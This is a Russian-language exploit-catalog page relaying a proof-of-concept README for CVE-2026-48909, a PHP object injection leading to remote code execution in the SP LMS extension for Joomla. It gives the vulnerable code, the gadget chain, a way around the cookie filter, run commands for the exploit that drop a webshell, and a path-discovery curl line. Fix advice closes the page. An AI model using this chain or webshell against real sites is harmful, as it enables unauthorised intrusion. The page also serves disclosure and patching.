Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-48909 — Эксплойт для подтверждения концепции CVE-2026-48909: неаутентифицированное удаленное выполнение кода через внедрение PHP-объектов в JoomShaper SP LMS. Включает рекомендации по обнаружению, эксплуатации и устранению. | Kitploit
Инструменты/GitHubGitHub/is4yev/cve-2026-48909
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubis4yev/cve-2026-48909

CVE-2026-48909

Эксплойт для подтверждения концепции CVE-2026-48909: неаутентифицированное удаленное выполнение кода через внедрение PHP-объектов в JoomShaper SP LMS. Включает рекомендации по обнаружению, эксплуатации и устранению.

Репозиторий
2321 месяц назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-48909 — SP LMS PHP Object Injection → RCE

CVE CVSS CWE Affected Fixed

Неаутентифицированное удаленное выполнение кода через PHP Object Injection в JoomShaper SP LMS (com_splms) ≤ 4.1.3 для Joomla CMS.

Автор: Amin İsayev / Proxima Cyber Security


Обзор

SP LMS — популярное расширение Joomla для управления обучением от JoomShaper с более чем 100 000 установок. Версии ≤ 4.1.3 передают cookie lmsOrders напрямую в unserialize() без какой-либо проверки, что позволяет неаутентифицированному злоумышленнику внедрить вредоносный PHP-объект и достичь удаленного выполнения кода через нативную цепочку гаджетов Joomla.


Уязвимость

Коренная причина

components/com_splms/models/cart.php строка 28:

root@kitploit:~
$cookie  = Factory::getApplication()->input->cookie;
$raw     = $cookie->get('lmsOrders', base64_encode(serialize(array())));
$decoded = base64_decode($raw);
$cartItems = unserialize($decoded);   // ← недоверенный пользовательский ввод

Cookie lmsOrders декодируется из base64 и передаётся напрямую в unserialize(). Злоумышленник полностью контролирует десериализуемый объект.

Цепочка гаджетов

Класс FormattedtextLogger Joomla предоставляет гаджет:

root@kitploit:~
lmsOrders cookie (контролируется злоумышленником)
  └─► unserialize()                             [cart.php:28]
        └─► FormattedtextLogger.__destruct()    [гаджет Joomla]
              └─► initFile() → File::write($path, $format)
                    └─► PHP-код записывается на диск → RCE

Примечание: RCE требует Joomla < 5.2.2.
В Joomla 5.2.2 исправлен FormattedtextLogger.__wakeup() (см. PR #44428).
PHP Object Injection всё ещё существует в com_splms ≤ 4.1.3 на всех версиях Joomla.

Обход фильтра

Input\Cookie::get() Joomla по умолчанию применяет фильтр cmd, удаляя символы +, / и = из значения cookie — символы, присутствующие в стандартном base64. Эксплойт использует:

  • Кодировку hex2bin() для избежания запрещённых символов PHP ($, _, {, }, \n)
  • Выравнивание длины для обеспечения делимости длины base64 на 3 (нет символов = в padding)
  • Перебор символов padding (62 варианта) для исключения / и + из вывода base64

PoC (Proof of Concept)

Обнаружение

root@kitploit:~
python3 CVE-2026-48909.py https://target.com
root@kitploit:~
[*] Цель : https://target.com
[*] Путь   : /index.php?option=com_splms&view=cart
[*] Проверка  : lmsOrders=Tzo4OiJzdGRDbGFzcyI6MDp7fQ==

[УЯЗВИМО] HTTP 500 на проверке vs 200 на безвредной — unserialize() вызывается из cookie
[!] Немедленно обновите SP LMS до >= 4.1.4.

Эксплуатация

root@kitploit:~
python3 CVE-2026-48909_exploit.py https://target.com /var/www/html/tmp/x.php

Скриншот PoC

Шелл активен по адресу https://target.com/tmp/x.php?c=id

Поиск пути на сервере (если неизвестен):

root@kitploit:~
# Хостинг cPanel — путь можно получить из страниц ошибок Joomla
curl -sk "https://target.com/administrator/" | grep -oP '\/home\d*\/[^"<\s]+'

# Часто используемые пути:
#   /var/www/html/tmp/x.php
#   /home/USER/public_html/tmp/x.php
#   /var/www/vhosts/DOMAIN/httpdocs/tmp/x.php

Требования

root@kitploit:~
pip install requests

Python 3.10+


Исправление / Устранение

  1. Обновите SP LMS до версии ≥ 4.1.4 немедленно
  2. Обновите Joomla до ≥ 5.2.2, чтобы удалить цепочку гаджетов
  3. В качестве временной меры — проверяйте и очищайте cookie lmsOrders перед десериализацией:
root@kitploit:~
// НЕ используйте unserialize() для данных, контролируемых пользователем
// Используйте json_encode/json_decode
$cartItems = json_decode(base64_decode($raw), true) ?? [];

Ссылки

  • CVE-2026-48909 — cve.org
  • CVE-2026-48909 — NVD
  • GHSA-gf8c-xmwj-whrh — GitHub Advisory
  • Joomla PR #44428 — исправление гаджета FormattedtextLogger
  • CWE-502: Десериализация недоверенных данных
  • OWASP: PHP Object Injection

Отказ от ответственности

Данный инструмент опубликован исключительно в образовательных целях и для авторизованного тестирования безопасности.
Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный данной программой.
Не используйте против систем, которыми вы не владеете или на тестирование которых у вас нет явного письменного разрешения.


Amin İsayev / Proxima Cyber Security — 2026

Скачать инструмент
ПолеПодробности
CVE IDCVE-2026-48909
GHSAGHSA-gf8c-xmwj-whrh
Затронутые версииSP LMS (com_splms) 1.0.0 – 4.1.3
Исправлено вSP LMS ≥ 4.1.4
Требования к Joomla< 5.2.2 (цепочка гаджетов исправлена в 5.2.2)
CVSS 4.09.5 Critical — AV:N/AC:L/AT:P/PR:N/UI:N
CWECWE-502: Десериализация недоверенных данных
Требуется аутентификацияНет
Раскрыто2026-05-26
Опубликовано2026-06-20